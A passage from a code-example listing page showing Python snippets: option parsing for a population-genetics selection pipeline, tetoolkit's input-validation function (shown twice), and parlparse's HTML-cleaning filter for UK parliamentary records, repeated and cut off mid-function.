        read the arguments and set sensible
        default values for the program
    """
    parser = OptionParser()
    parser.add_option('-v', '--debug',
                      action="store_true", dest='debug',
                      help="Print debug messages")
    parser.add_option('-q', '--silent', action="store_false",
                      dest='verbose', help="Run Silently")
    parser.add_option('-i', '--vcf',
                      dest='vcf_input', help="VCF input file")
    parser.add_option('-c', '--chromosome',
                      dest='chromosome', help="Chromosome")
    parser.add_option('-l', '--log-fire', dest='log_file',
                      help="Log file for the pipeline process")
    parser.add_option('--maf', dest='maf',
                      help='Minor allele-frequency filter')
    parser.add_option('--hwe', dest='hwe',
                      help="Hardy-Weinberg Equillibrium filter proportion")
    parser.add_option('--remove-missing', dest="remove_missing",
                      help="Remove missing genotypes")
    parser.add_option('--config-file', dest="config_file",
                      help="Config file")
    parser.add_option('--phased-vcf', action="store_true",
                      dest="phased_vcf", help="Phased vcf file")
    parser.add_option('--population', dest="population",
                      help="Population Code ")
    parser.add_option('--imputation', action="store_true",
                      dest="imputation", help="Imputation")
    parser.add_option('--full-process', action="store_true",
                      dest="full_process", help="Run Entire Process")
    parser.add_option('--gzvcf', action="store_true",
                      dest="vcf_gz", help="VCF input is in GZ file (optional)")
    parser.add_option('--TajimaD', dest='tajimas_d',
                      help="Output Tajima's D statistic in bins of size (bp)")
    parser.add_option('--fay-Window-Width', dest='fayandWuWindowWidth',
                      help="Sliding window width for Fay and Wu's H (kb)")
    parser.add_option('--fay-Window-Jump', dest="fayandWuWindowJump",
                      help=("Window Jump for Fay and Wus ( if fay-Window-Width"
                            " = fay-Window-Jump non-overlapping windows "
                            "are used (kb)"))
    parser.add_option('--no-clean-up', dest="no_clean_up", action="store_true",
                      help="Do not clean up intermediate datafiles")
    parser.add_option('--impute-split-size', dest='impute_split_size',
                      help="impute2 split size (Mb)")
    parser.add_option('--ehh-window-size', dest="multi_window_size",
                      help="Multicore window size (Mp)")
    parser.add_option('--ehh-overlap', dest="ehh_overlap",
                      help="EHH window overlap (Mb)")
    parser.add_option('--daf', dest='daf',
                      help="Derived Allele Frequency filter proportion")
    parser.add_option('--big-gap', dest="big_gap",
                      help=("Gap size for not calculating iHH if "
                            "core SNP spans this gap (kb)"))
    parser.add_option('--small-gap', dest='small_gap',
                      help=("Gap size for applying a penalty to "
                            "the area calculated by iHH (kb)"))
    parser.add_option('--small-gap-penalty', dest="small_gap_penalty",
                      help=("Penalty multiplier for intergration steps"
                            "in iHH see manual for formula, usually the "
                            "same as small-gap"))
    parser.add_option('--cores', dest='cores',
                      help="Override cores avaliable setting")
    parser.add_option('--no-ihs',dest='no_ihs',action="store_true"
                      , help='Disable iHS and iHH calculation')
    parser.add_option('--haps', dest='haps',
                        help="Shapeit haps file")
    parser.add_option('--sample', dest='sample',
                        help='Corresponding sample file to accompany haps')
    parser.add_option('--beagle',dest='beagle',action='store_true',
                      help="Use beagle to phase")
    parser.add_option('--no-gmap',dest="no_genetic_map",action="store_true",
                      help="Do not use a genetic map for the analysis")
    parser.add_option('--physical-ihs',dest="physical_ihs",help="Use physical map for calculating iHS",action="store_true")
    parser.add_option("--no-plots" , dest="no_plots", action="store_true",
                      help="Do not create rudimentary plots")
    parser.add_option('--version', dest = "ver", action="store_true",
                      help="Print version info")
    (options, args) = parser.parse_args()
    if(options.verbose is not None):
        if(options.debug):
            logger.setLevel(logging.DEBUG)
        else:
            logger.setLevel(logging.ERROR)
    if(options.ver is True): 
        print "Version: {0}".format(__version__)
        sys.exit(1)        

    # Obligatory arguments
    assert options.vcf_input or (options.haps and options.sample) is not None, \
        "No VCF or haps/sample file has been specified as input"
    assert options.chromosome is not None, \
        "No chromosome has been specified to the script"
    assert options.population is not None, \
        "Population code has not been specified."
    assert options.config_file is not None, \
        "Config file has not been specified."
    if(options.haps and options.sample):
        assert os.path.isfile(options.haps), \
                "Cannot locate haps file path = {0}".format(options.haps)
        assert os.path.isfile(options.sample), \
                "Cannot locate sample file path = {0}".format(options.sample)
    elif(options.vcf_input):
        assert os.path.isfile(options.vcf_input), \
                "Cannot locate vcf input file path = {0}".format(options.vcf_input) 
    if(options.fayandWuWindowJump is None):
        options.fayandWuWindowJump = str(5000)
    else:
        options.fayandWuWindowJump = str(
            int(float(options.fayandWuWindowJump) * 1e3))
    if(options.fayandWuWindowWidth is None):
        options.fayandWuWindowWidth = str(5000)
    else:
        options.fayandWuWindowWidth = str(
            int(float(options.fayandWuWindowWidth) * 1e3))
    if(options.no_clean_up is None):
        options.no_clean_up = False
    if(options.tajimas_d is None):
        options.tajimas_d = str(5000)
    else:
        options.tajimas_d = str(
            int(float(options.tajimas_d) * 1e3))
    if(options.imputation is None):
        options.imputation = False
    if(options.hwe is None):
        options.hwe = str(0.0001)
    if(options.maf is None):
        options.maf = str(0.01)
    if(options.daf is None):
        options.daf = str(0.00)
    if(options.remove_missing is None):
        options.remove_missing = str(0.99)
    if (options.phased_vcf is None):
        options.phased_vcf = False
    if (options.full_process is None):
        options.full_process = False
    if (options.vcf_gz is None):
        options.vcf_gz = False
    if (options.no_ihs is None):
        options.no_ihs = False
    if(options.log_file is None):
        options.log_file = options.population + \
            options.chromosome + "_selection_pipeline.log"
    if (options.impute_split_size is None):
        options.impute_split_size = str(5000000)
    else:
        options.impute_split_size = str(
            int(float(options.impute_split_size) * 1e6))
    if (options.multi_window_size is None):
        options.multi_window_size = str(int(5*1e6))
    else:
        options.multi_window_size = str(
            int(float(options.multi_window_size) * 1e6))
    if (options.ehh_overlap is None):
        options.ehh_overlap = str(int(2*1e6))
    else:
        options.ehh_overlap = str(
            int(float(options.ehh_overlap) * 1e6))
    if (options.big_gap is None):
        options.big_gap = str(0)
    else:
        options.big_gap = str(
            int(float(options.big_gap) * 1e3))
    if (options.small_gap is None):
        options.small_gap = str(0)
    else:
         options.small_gap = str(
            int(float(options.small_gap) * 1e3))
    if (options.small_gap_penalty is None):
        options.small_gap_penalty = str(0)
    else:
        options.small_gap_penalty = str(
            int(float(options.small_gap_penalty) * 1e3))
    if (options.no_genetic_map):
        # Must set beagle to true becasue shapeit will not
        # Work without a genetic map
        options.beagle = True
    if (options.no_plots is None):
        options.no_plots = False
    if (options.physical_ihs is None):
        options.physical_ihs = False
    return options

Example 27

Project: tetoolkit
Source File: ReadInputs.py
View license
def read_opts(parser):
    ''' object parser contains parsed options '''
    
    args = parser.parse_args()
    
    #treatment files
    for i in range(len(args.tfiles)) :
        if not os.path.isfile(args.tfiles[i]) :
            logging.error("No such file: %s !\n" % (args.tfiles[i]))
            sys.exit(1)
        
    if not os.path.isfile(args.tinputs[0]) :
            logging.error("No such file: %s !\n" % (args.tinputs))
            sys.exit(1)
    
    #control files 
    if args.cfiles != None :      
        for i in range(len(args.cfiles)) :
            if not os.path.isfile(args.cfiles[i]) :
                logging.error("No such file: %s !\n" % (args.cfiles[i]))
                sys.exit(1)
            else :
                if args.cinputs == None :
                    logging.error("No input for control samples!\n")
                    sys.exit(1)
    else :
        args.cinputs = None
        
    if args.TEmode != 'multi' and args.TEmode != 'uniq' :
        logging.error("Does not support TE mode : %s !\n" % (args.TEmode))
    # file parser
    if args.format == "BAM" :
        args.parser = BAMFile
#    elif args.format == "SAM" :
#    	args.parser = SAMFile
    elif args.format == "BED" :
        args.parser = BEDFile
    else :
        logging.error("Does not support such file format: %s !\n" %(args.format))
        sys.exit(1)
    #window size
    if args.wsize < 0 :
        logging.error("window size should be greater than 0, default value %d was used\n" % (WIN_SIZE))
        args.wsize = WIN_SIZE 
    
    #step size
    if args.step < 0 :
        logging.error("step size should be greater than 0, default value  %d was used\n" % (STEP))
        args.step = STEP
        
    if args.step > args.wsize :
        logging.error("step should be smaller than window size,default value %d was used\n" % (STEP))
        args.step = STEP
    
    #cutoff
    if args.minread < 0 :
        args.minread = 0
    if args.minread > 20 :
        args.minread = 20
    
    #species
    if args.species[0] not in ['hg','mm','dm','tm'] :
        logging.error("species not found %s \n" %(args.species[0]))
        parser.print_help()
        sys.exit(1)
        
    args.gsize = efgsize[args.species[0]]
    args.gsize = float(args.gsize)     
    if args.species[0] == 'hg' :
        args.chrom = HS_CHROM
        args.species[0] = 'hg19'
       
        
    elif args.species[0] == 'mm' :
        args.chrom = MM_CHROM
        args.species[0] = 'mm9'
    elif args.species[0] == 'dm' :
        args.chrom = DM_CHROM
        args.species[0] = 'dm3'
    elif args.species[0] == 'tm' :
        args.chrom = TM_CHROM
    
    #normalization
    if args.norm not in ['sd','bc'] :
        logging.error("normalization method %s not supported\n" % (args.norm))
        parser.print_help()
        sys.exit(1)
    
    #p-value
    if args.pval < 0 or args.pval > 1 :
        logging.error("p-value should be a value in [0,1]\n")
        sys.exit(1)            
    args.log_pvalue = log(args.pval,10)*-10
    #gap size
    if args.gap < 0 :
        logging.error("gap size should be greater than 0, default value was used\n")
        args.gap = GAP
    
    #fragment size
    if args.fragsize < 0 :
        logging.error("fragment size should be greater than 0, default value %d was used\n" % (FRAG_SIZE))
        args.fragsize = FRAG_SIZE
    
    #output filenames
    args.dfbs = args.prj_name+"_dfbs"
    
    # logging object
    logging.basicConfig(level=(4-args.verbose)*10,
                        format='%(levelname)-5s @ %(asctime)s: %(message)s ',
                        datefmt='%a, %d %b %Y %H:%M:%S',
                        stream=sys.stderr,
                        filemode="w"
                        )
    
    args.error   = logging.critical        # function alias
    args.warn    = logging.warning
    args.debug   = logging.debug
    args.info    = logging.info
    
    cinput = None
    if args.cinputs != None:
        cinput = args.cinputs[0]
        
    args.argtxt = "\n".join((
        "# ARGUMENTS LIST:",\
        "# name = %s" % (args.prj_name),\
        "# treatment files = %s" % (args.tfiles),\
        "# control files = %s" % (args.cfiles),\
        '# treatment input = %s' % (args.tinputs[0]),\
        '# control input = %s' % (cinput),\
 #       "# window size = %d" % (args.wsize),\
        "# step = %d" % (args.step),\
 #       "# gap = %d" % (args.gap),\
        "# fragment size = %d" % (args.fragsize),\
        "# species = %s (hg:human, rn:rat, mm:mouse)" % (args.species[0]),\
        "# min read cutoff = %d" % (args.minread),\
        "# statistical model = Poisson distribution" ,\
        "# normalization = %s (sd: sequence depth, bc: bin correlation)" % (args.norm),\
        "# pvalue cutoff = %.2e" % (args.pval),\
        "# TEmode = %s " % (args.TEmode)
     #   "# TE annotation file = %s \n" % (args.TEannotation)
        ))
    
    return args  

Example 28

Project: tetoolkit
Source File: ReadInputs.py
View license
def read_opts(parser):
    ''' object parser contains parsed options '''
    
    args = parser.parse_args()
    
    #treatment files
    for i in range(len(args.tfiles)) :
        if not os.path.isfile(args.tfiles[i]) :
            logging.error("No such file: %s !\n" % (args.tfiles[i]))
            sys.exit(1)
        
    if not os.path.isfile(args.tinputs[0]) :
            logging.error("No such file: %s !\n" % (args.tinputs))
            sys.exit(1)
    
    #control files 
    if args.cfiles != None :      
        for i in range(len(args.cfiles)) :
            if not os.path.isfile(args.cfiles[i]) :
                logging.error("No such file: %s !\n" % (args.cfiles[i]))
                sys.exit(1)
            else :
                if args.cinputs == None :
                    logging.error("No input for control samples!\n")
                    sys.exit(1)
    else :
        args.cinputs = None
        
    if args.TEmode != 'multi' and args.TEmode != 'uniq' :
        logging.error("Does not support TE mode : %s !\n" % (args.TEmode))
    # file parser
    if args.format == "BAM" :
        args.parser = BAMFile
#    elif args.format == "SAM" :
#    	args.parser = SAMFile
    elif args.format == "BED" :
        args.parser = BEDFile
    else :
        logging.error("Does not support such file format: %s !\n" %(args.format))
        sys.exit(1)
    #window size
    if args.wsize < 0 :
        logging.error("window size should be greater than 0, default value %d was used\n" % (WIN_SIZE))
        args.wsize = WIN_SIZE 
    
    #step size
    if args.step < 0 :
        logging.error("step size should be greater than 0, default value  %d was used\n" % (STEP))
        args.step = STEP
        
    if args.step > args.wsize :
        logging.error("step should be smaller than window size,default value %d was used\n" % (STEP))
        args.step = STEP
    
    #cutoff
    if args.minread < 0 :
        args.minread = 0
    if args.minread > 20 :
        args.minread = 20
    
    #species
    if args.species[0] not in ['hg','mm','dm','tm'] :
        logging.error("species not found %s \n" %(args.species[0]))
        parser.print_help()
        sys.exit(1)
        
    args.gsize = efgsize[args.species[0]]
    args.gsize = float(args.gsize)     
    if args.species[0] == 'hg' :
        args.chrom = HS_CHROM
        args.species[0] = 'hg19'
       
        
    elif args.species[0] == 'mm' :
        args.chrom = MM_CHROM
        args.species[0] = 'mm9'
    elif args.species[0] == 'dm' :
        args.chrom = DM_CHROM
        args.species[0] = 'dm3'
    elif args.species[0] == 'tm' :
        args.chrom = TM_CHROM
    
    #normalization
    if args.norm not in ['sd','bc'] :
        logging.error("normalization method %s not supported\n" % (args.norm))
        parser.print_help()
        sys.exit(1)
    
    #p-value
    if args.pval < 0 or args.pval > 1 :
        logging.error("p-value should be a value in [0,1]\n")
        sys.exit(1)            
    args.log_pvalue = log(args.pval,10)*-10
    #gap size
    if args.gap < 0 :
        logging.error("gap size should be greater than 0, default value was used\n")
        args.gap = GAP
    
    #fragment size
    if args.fragsize < 0 :
        logging.error("fragment size should be greater than 0, default value %d was used\n" % (FRAG_SIZE))
        args.fragsize = FRAG_SIZE
    
    #output filenames
    args.dfbs = args.prj_name+"_dfbs"
    
    # logging object
    logging.basicConfig(level=(4-args.verbose)*10,
                        format='%(levelname)-5s @ %(asctime)s: %(message)s ',
                        datefmt='%a, %d %b %Y %H:%M:%S',
                        stream=sys.stderr,
                        filemode="w"
                        )
    
    args.error   = logging.critical        # function alias
    args.warn    = logging.warning
    args.debug   = logging.debug
    args.info    = logging.info
    
    cinput = None
    if args.cinputs != None:
        cinput = args.cinputs[0]
        
    args.argtxt = "\n".join((
        "# ARGUMENTS LIST:",\
        "# name = %s" % (args.prj_name),\
        "# treatment files = %s" % (args.tfiles),\
        "# control files = %s" % (args.cfiles),\
        '# treatment input = %s' % (args.tinputs[0]),\
        '# control input = %s' % (cinput),\
 #       "# window size = %d" % (args.wsize),\
        "# step = %d" % (args.step),\
 #       "# gap = %d" % (args.gap),\
        "# fragment size = %d" % (args.fragsize),\
        "# species = %s (hg:human, rn:rat, mm:mouse)" % (args.species[0]),\
        "# min read cutoff = %d" % (args.minread),\
        "# statistical model = Poisson distribution" ,\
        "# normalization = %s (sd: sequence depth, bc: bin correlation)" % (args.norm),\
        "# pvalue cutoff = %.2e" % (args.pval),\
        "# TEmode = %s " % (args.TEmode)
     #   "# TE annotation file = %s \n" % (args.TEannotation)
        ))
    
    return args  

Example 29

Project: parlparse
Source File: runfilters.py
View license
def RunFilterFile(FILTERfunction, xprev, sdate, sdatever, dname, jfin, patchfile, jfout, bquietc):
    # now apply patches and parse
    patchtempfilename = tempfile.mktemp("", "pw-applypatchtemp-", miscfuncs.tmppath)

    if not bquietc:
        print "reading " + jfin

    # apply patch filter
    kfin = jfin
    if os.path.isfile(patchfile) and ApplyPatches(jfin, patchtempfilename, patchfile):
        kfin = patchtempfilename

    # read the text of the file
    ofin = open(kfin)
    text = ofin.read()
    ofin.close()

    # do the filtering according to the type.  Some stuff is being inlined here
    if dname == 'regmem' or dname == 'votes' or dname == 'ni':
        regmemout = open(tempfilename, 'w')
        try:
            FILTERfunction(regmemout, text, sdate, sdatever)  # totally different filter function format
        finally:
            regmemout.close()
        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming
        if os.path.isfile(jfout):
            os.remove(jfout)
        os.rename(tempfilename, jfout)
        return

    safejfout = jfout
    assert dname in ('wrans', 'debates', 'wms', 'westminhall', 'lordspages')

    decode_from_utf8 = False
    if sdate > '2014-01-01' or (sdate > '2006-05-07' and re.search('<notus-date', text)):
        decode_from_utf8 = True
        text = re.sub("\n", ' ', text)
        text = re.sub("\s{2,}", ' ', text) # No need for multiple spaces anywhere
        text = re.sub("</?notus-date[^>]*>", "", text)
        text = re.sub("\s*<meta[^>]*>\s*", "", text)
        text = re.sub('(<h5 align="left">)((?:<a name="(.*?)">)*)', r"\2\1", text) # If you can't beat them, ...
        text = re.sub("(<br><b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b>)(\s+)(?i)", r"\1<br>\2", text)
        text = re.sub("(\s+)(<b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b><br>)(?i)", r"\1<br>\2", text)

        # Make sure correction is before written answer question number
        text = re.sub('(<a href="[^"]*corrtext[^"]*")\s*shape="rect">\s*(.*?)\s*(</a>)', r'\1>\2\3', text)
        text = re.sub('(\[\d+\])\s*((?:</p>)?)\s*(<a href="[^"]*corrtext[^"]*">.*?</a>)', r'\3 \1\2', text)

        # Fix new thing where they sometimes put (a), (b) of wrans, or "Official Report", in separate paragraphs
        # Two regular expressions, so as not to lose needed end </p> of a column heading.
        italic_para = '\s*<p>\s*(<i>\s*(?:\(.\)|Official Report,?)\s*</i>)\s*</p>\s*'
        text = re.sub('(?<!</b>)</p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b></p>)' + italic_para + '<p[^>]*>', r' \1 ', text)

        # May also need the same thing with a space, and look behind requires a fixed width pattern.
        text = re.sub('(?<!</b>) </p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b> </p>)' + italic_para + '<p[^>]*>', r' \1 ', text)
                
        # Don't want bad XHTML self closed table cells.
        text = re.sub('<td([^>]*) ?/>', r'<td\1></td>', text)
        # Or pointless empty headings
        text = re.sub('<h[45] align="[^"]*" ?/>', '', text)

        # Lords, big overall replacements
        text = text.replace('<br></br>', '<br>')
        text = text.replace('<br/>', '<br>')
        if dname == 'lordspages':
            text = re.sub(' shape="rect">', '>', text)
            text = re.sub(' class="anchor"', '', text)
            text = re.sub(' class="anchor noCont"', '', text)
            text = re.sub(' class="anchor-column"', '', text)
            text = re.sub(' class="columnNum"', '', text)
            text = re.sub('(<a[^>]*>) (</a>)', r'\1\2', text)
            text = re.sub('(<h5>)((?:<a name="(.*?)">(?:</a>)?)*)', r"\2\1", text) # If you can't beat them, ...
            text = re.sub('<columnNum><br />( |\xc2\xa0)<br />', '<br>&nbsp;<br>', text)
            text = re.sub('<br />( |\xc2\xa0)<br /></columnNum>', '<br>&nbsp;<br>', text)
            text = text.replace('<b align="center">', '<b>')
            text = text.replace('<br />', '<br>')
            text = text.replace('CONTENTS', 'CONTENTS\n')
            text = re.sub('</?small>', '', text)
            text = re.sub('<div class="amendment(?:_heading)?">', '', text)
            text = re.sub('</?div>', '', text)
            # Double bolding sometimes has some <a> tags in between
            text = re.sub(r'<b>((?:</?a[^>]*>|\s)*)<b>', r'\1<b>', text)
            text = re.sub('</b></b>', '</b>', text)
            text = re.sub('</b><b>', '', text)
            text = re.sub('<I></I>', '', text)

    # Changes in 2008-09 session
    if sdate>'2008-12-01' and dname=='lordspages':
        text = re.sub('(?i)Asked By (<b>.*?)</b>', r'\1:</b>', text)
        text = re.sub('(?i)((?:Moved|Tabled) By) ?((?:<a name="[^"]*"></a>)*)<b>(.*?)</b>', r'\1 \2\3', text)
        text = re.sub('(?i)(Moved on .*? by) ?<b>(.*?)</b>', r'\1 \2', text)

    if decode_from_utf8:
        # Some UTF-8 gets post-processed into nonsense
        # XXX - should probably be in miscfuncs.py/StraightenHTMLrecurse with other character set evil
        text = text.replace("\xe2\x22\xa2", "&trade;")
        text = text.replace("\xc2(c)", "&copy;")
        text = text.replace("\xc2(r)", "&reg;")
        text = text.replace("\xc21/4", "&frac14;")
        text = text.replace("\xc21/2", "&frac12;")
        text = text.replace("\xc23/4", "&frac34;")
        text = text.replace("\xc3\"", "&#279;")
        text = text.replace("\xc3 ", "&agrave;")
        text = text.replace("\xc3(c)", "&eacute;")
        text = text.replace("\xc3(r)", "&icirc;")
        text = text.replace("\xc31/4", "&uuml;")
        # And it's true UTF-8 since the start of the 2009 session, let's pretend it isn't.
        try:
            text = text.decode('utf-8').encode('ascii', 'xmlcharrefreplace')
        except:
            print "Failed to decode text from utf-8"
            pass

    # They've started double bolding names, parts of names, splitting names up, and having a "[" on its own
    if sdate >= '2013-01-01':
        text = re.sub(r'</b>(\s*)<b>', r'\1', text)
        # <b> <b>Name</b> (Constituency) (Party):</b>
        text = re.sub('<b>\s*<b>([^<]*)</b>([^<]*)</b>', r'<b>\1\2</b>', text)
        # <b><b>Name bits:</b></b>
        text = re.sub('<b>\s*(<b>([^<]|<i>\s*\(Urgent Question\)\s*</i>)*</b>\s*)</b>', r'\1', text)
        # <p> <b>[</b> </p> <p> <b>TIME</b> </p>
        text = re.sub('<p>\s*<b>\[</b>\s*</p>\s*<p>\s*<b>([^<]*)</b>\s*</p>', r'<p> <b>[\1</b> </p>', text)
        # And have changed <center> to <span class="centred">
        text = re.sub('<span class="centred">(.*?)</span>', r'<center>\1</center>', text)

    if sdate >= '2015-10-12':
        # annoying double <b> round members rose text
        text = re.sub(r'<b><b>Several hon. Members </b>', '<b>Several hon. Members ', text)

    if sdate >= '2016-01-01':
        # Deal with big heading spotting aname appearing AFTER heading
        text = re.sub('(<h3(?:(?!<h3).)*?)(<a name="ordayhd_\d">)', r'\2\1', text)

    (flatb, gidname) = FILTERfunction(text, sdate)
    for i in range(len(gidname)):
        tempfilenameoldxml = None

        gidnam = gidname[i]
        if gidname[i] == 'lordswms':
            gidnam = 'wms'
        if gidname[i] == 'lordswrans':
            gidnam = 'wrans'
        CreateGIDs(gidnam, sdate, sdatever, flatb[i])
        jfout = safejfout
        if gidname[i] != 'lords':
            jfout = re.sub('(daylord|lordspages)', gidname[i], jfout)

        # wrans case is special, with its question-id numbered gids
        if dname == 'wrans':
            majblocks = CreateWransGIDs(flatb[i], (sdate + sdatever)) # combine the date and datever.  the old style gids stand on the paragraphs still
            bMakeOldWransGidsToNew = (sdate < "2005")

        fout = open(tempfilename, "w")
        WriteXMLHeader(fout);
        fout.write('<publicwhip scrapeversion="%s" latest="yes">\n' % sdatever)

        # go through and output all the records into the file
        if dname == 'wrans':
            for majblock in majblocks:
                WriteXMLspeechrecord(fout, majblock[0], bMakeOldWransGidsToNew, True)
                for qblock in majblock[1]:
                    qblock.WriteXMLrecords(fout, bMakeOldWransGidsToNew)
        else:
            for qb in flatb[i]:
                WriteXMLspeechrecord(fout, qb, False, False)
        fout.write("</publicwhip>\n\n")
        fout.close()

        # load in a previous file and over-write it if necessary
        if xprev:
            xprevin = xprev[0]
            if gidname[i] != 'lords':
                xprevin = re.sub('(daylord|lordspages)', gidname[i], xprevin)
            if os.path.isfile(xprevin):
                xin = open(xprevin, "r")
                xprevs = xin.read()
                xin.close()

                # separate out the scrape versions
                mpw = re.search('<publicwhip([^>]*)>\n([\s\S]*?)</publicwhip>', xprevs)
                if mpw.group(1):
                    re.match(' scrapeversion="([^"]*)" latest="yes"', mpw.group(1)).group(1) == xprev[1]
                # else it's old style xml files that had no scrapeversion or latest attributes
                if dname == 'wrans':
                    xprevcompress = FactorChangesWrans(majblocks, mpw.group(2))
                else:
                    xprevcompress = FactorChanges(flatb[i], mpw.group(2))

                tempfilenameoldxml = tempfile.mktemp(".xml", "pw-filtertempold-", miscfuncs.tmppath)
                foout = open(tempfilenameoldxml, "w")
                WriteXMLHeader(foout)
                foout.write('<publicwhip scrapeversion="%s" latest="no">\n' % xprev[1])
                foout.writelines(xprevcompress)
                foout.write("</publicwhip>\n\n")
                foout.close()

        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming

        # in case of error, an exception is thrown, so this line would not be reached
        # we rename both files (the old and new xml) at once

        if os.path.isfile(jfout):
            os.remove(jfout)
        if not os.path.isdir(os.path.dirname(jfout)):  # Lords output directories need making here
            os.mkdir(os.path.dirname(jfout))
        os.rename(tempfilename, jfout)

        # copy over onto old xml file
        if tempfilenameoldxml:
            if sys.platform != "win32":
                xmlvalidate.parse(tempfilenameoldxml) # validate XML before renaming
            assert os.path.isfile(xprevin)
            os.remove(xprevin)
            os.rename(tempfilenameoldxml, xprevin)

Example 30

Project: parlparse
Source File: runfilters.py
View license
def RunFilterFile(FILTERfunction, xprev, sdate, sdatever, dname, jfin, patchfile, jfout, bquietc):
    # now apply patches and parse
    patchtempfilename = tempfile.mktemp("", "pw-applypatchtemp-", miscfuncs.tmppath)

    if not bquietc:
        print "reading " + jfin

    # apply patch filter
    kfin = jfin
    if os.path.isfile(patchfile) and ApplyPatches(jfin, patchtempfilename, patchfile):
        kfin = patchtempfilename

    # read the text of the file
    ofin = open(kfin)
    text = ofin.read()
    ofin.close()

    # do the filtering according to the type.  Some stuff is being inlined here
    if dname == 'regmem' or dname == 'votes' or dname == 'ni':
        regmemout = open(tempfilename, 'w')
        try:
            FILTERfunction(regmemout, text, sdate, sdatever)  # totally different filter function format
        finally:
            regmemout.close()
        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming
        if os.path.isfile(jfout):
            os.remove(jfout)
        os.rename(tempfilename, jfout)
        return

    safejfout = jfout
    assert dname in ('wrans', 'debates', 'wms', 'westminhall', 'lordspages')

    decode_from_utf8 = False
    if sdate > '2014-01-01' or (sdate > '2006-05-07' and re.search('<notus-date', text)):
        decode_from_utf8 = True
        text = re.sub("\n", ' ', text)
        text = re.sub("\s{2,}", ' ', text) # No need for multiple spaces anywhere
        text = re.sub("</?notus-date[^>]*>", "", text)
        text = re.sub("\s*<meta[^>]*>\s*", "", text)
        text = re.sub('(<h5 align="left">)((?:<a name="(.*?)">)*)', r"\2\1", text) # If you can't beat them, ...
        text = re.sub("(<br><b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b>)(\s+)(?i)", r"\1<br>\2", text)
        text = re.sub("(\s+)(<b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b><br>)(?i)", r"\1<br>\2", text)

        # Make sure correction is before written answer question number
        text = re.sub('(<a href="[^"]*corrtext[^"]*")\s*shape="rect">\s*(.*?)\s*(</a>)', r'\1>\2\3', text)
        text = re.sub('(\[\d+\])\s*((?:</p>)?)\s*(<a href="[^"]*corrtext[^"]*">.*?</a>)', r'\3 \1\2', text)

        # Fix new thing where they sometimes put (a), (b) of wrans, or "Official Report", in separate paragraphs
        # Two regular expressions, so as not to lose needed end </p> of a column heading.
        italic_para = '\s*<p>\s*(<i>\s*(?:\(.\)|Official Report,?)\s*</i>)\s*</p>\s*'
        text = re.sub('(?<!</b>)</p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b></p>)' + italic_para + '<p[^>]*>', r' \1 ', text)

        # May also need the same thing with a space, and look behind requires a fixed width pattern.
        text = re.sub('(?<!</b>) </p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b> </p>)' + italic_para + '<p[^>]*>', r' \1 ', text)
                
        # Don't want bad XHTML self closed table cells.
        text = re.sub('<td([^>]*) ?/>', r'<td\1></td>', text)
        # Or pointless empty headings
        text = re.sub('<h[45] align="[^"]*" ?/>', '', text)

        # Lords, big overall replacements
        text = text.replace('<br></br>', '<br>')
        text = text.replace('<br/>', '<br>')
        if dname == 'lordspages':
            text = re.sub(' shape="rect">', '>', text)
            text = re.sub(' class="anchor"', '', text)
            text = re.sub(' class="anchor noCont"', '', text)
            text = re.sub(' class="anchor-column"', '', text)
            text = re.sub(' class="columnNum"', '', text)
            text = re.sub('(<a[^>]*>) (</a>)', r'\1\2', text)
            text = re.sub('(<h5>)((?:<a name="(.*?)">(?:</a>)?)*)', r"\2\1", text) # If you can't beat them, ...
            text = re.sub('<columnNum><br />( |\xc2\xa0)<br />', '<br>&nbsp;<br>', text)
            text = re.sub('<br />( |\xc2\xa0)<br /></columnNum>', '<br>&nbsp;<br>', text)
            text = text.replace('<b align="center">', '<b>')
            text = text.replace('<br />', '<br>')
            text = text.replace('CONTENTS', 'CONTENTS\n')
            text = re.sub('</?small>', '', text)
            text = re.sub('<div class="amendment(?:_heading)?">', '', text)
            text = re.sub('</?div>', '', text)
            # Double bolding sometimes has some <a> tags in between
            text = re.sub(r'<b>((?:</?a[^>]*>|\s)*)<b>', r'\1<b>', text)
            text = re.sub('</b></b>', '</b>', text)
            text = re.sub('</b><b>', '', text)
            text = re.sub('<I></I>', '', text)

    # Changes in 2008-09 session
    if sdate>'2008-12-01' and dname=='lordspages':
        text = re.sub('(?i)Asked By (<b>.*?)</b>', r'\1:</b>', text)
        text = re.sub('(?i)((?:Moved|Tabled) By) ?((?:<a name="[^"]*"></a>)*)<b>(.*?)</b>', r'\1 \2\3', text)
        text = re.sub('(?i)(Moved on .*? by) ?<b>(.*?)</b>', r'\1 \2', text)

    if decode_from_utf8:
        # Some UTF-8 gets post-processed into nonsense
        # XXX - should probably be in miscfuncs.py/StraightenHTMLrecurse with other character set evil
        text = text.replace("\xe2\x22\xa2", "&trade;")
        text = text.replace("\xc2(c)", "&copy;")
        text = text.replace("\xc2(r)", "&reg;")
        text = text.replace("\xc21/4", "&frac14;")
        text = text.replace("\xc21/2", "&frac12;")
        text = text.replace("\xc23/4", "&frac34;")
        text = text.replace("\xc3\"", "&#279;")
        text = text.replace("\xc3 ", "&agrave;")
        text = text.replace("\xc3(c)", "&eacute;")
        text = text.replace("\xc3(r)", "&icirc;")
        text = text.replace("\xc31/4", "&uuml;")
        # And it's true UTF-8 since the start of the 2009 session, let's pretend it isn't.
        try:
            text = text.decode('utf-8').encode('ascii', 'xmlcharrefreplace')
        except:
            print "Failed to decode text from utf-8"
            pass

    # They've started double bolding names, parts of names, splitting names up, and having a "[" on its own
    if sdate >= '2013-01-01':
        text = re.sub(r'</b>(\s*)<b>', r'\1', text)
        # <b> <b>Name</b> (Constituency) (Party):</b>
        text = re.sub('<b>\s*<b>([^<]*)</b>([^<]*)</b>', r'<b>\1\2</b>', text)
        # <b><b>Name bits:</b></b>
